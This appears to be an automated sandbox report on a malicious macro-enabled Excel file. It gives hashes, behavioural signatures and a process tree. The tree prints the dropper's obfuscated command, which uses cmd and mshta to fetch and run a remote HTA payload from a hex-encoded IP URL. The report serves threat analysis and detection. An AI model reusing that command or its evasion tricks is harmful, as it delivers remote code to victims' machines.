Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    19-01-2022 10:55

General

  • Target

    aca67468ced86d88c980d851092607e06405b3109230404fb7c51c6c916f389b.xlsm

  • Size

    114KB

  • MD5

    4962c644e09bb0011788f7b2fe368e40

  • SHA1

    13465cd4f8d94af607145cb65eb901a71a33437d

  • SHA256

    aca67468ced86d88c980d851092607e06405b3109230404fb7c51c6c916f389b

  • SHA512

    320c40058c983b6b9be51635f467779a7445c40ce69c3be890f27e61d2364912fc8ecd46224703ad9165b83607df5ad8e4e488da0346e57d9d85213cb0e78541

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/sec.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\aca67468ced86d88c980d851092607e06405b3109230404fb7c51c6c916f389b.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:968
      • C:\Windows\system32\mshta.exe
        mshta http://0x5cff39c3/sec/sec.html
        3⤵
        • Blocklisted process makes network request
        PID:2696

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3052-115-0x00007FFDCF190000-0x00007FFDCF1A0000-memory.dmp

    Filesize

    64KB

  • memory/3052-116-0x00007FFDCF190000-0x00007FFDCF1A0000-memory.dmp

    Filesize

    64KB

  • memory/3052-117-0x00007FFDCF190000-0x00007FFDCF1A0000-memory.dmp

    Filesize

    64KB

  • memory/3052-118-0x00007FFDCF190000-0x00007FFDCF1A0000-memory.dmp

    Filesize

    64KB

  • memory/3052-119-0x00007FFDCF190000-0x00007FFDCF1A0000-memory.dmp

    Filesize

    64KB

  • memory/3052-128-0x00007FFDCC4B0000-0x00007FFDCC4C0000-memory.dmp

    Filesize

    64KB

  • memory/3052-129-0x00007FFDCC4B0000-0x00007FFDCC4C0000-memory.dmp

    Filesize

    64KB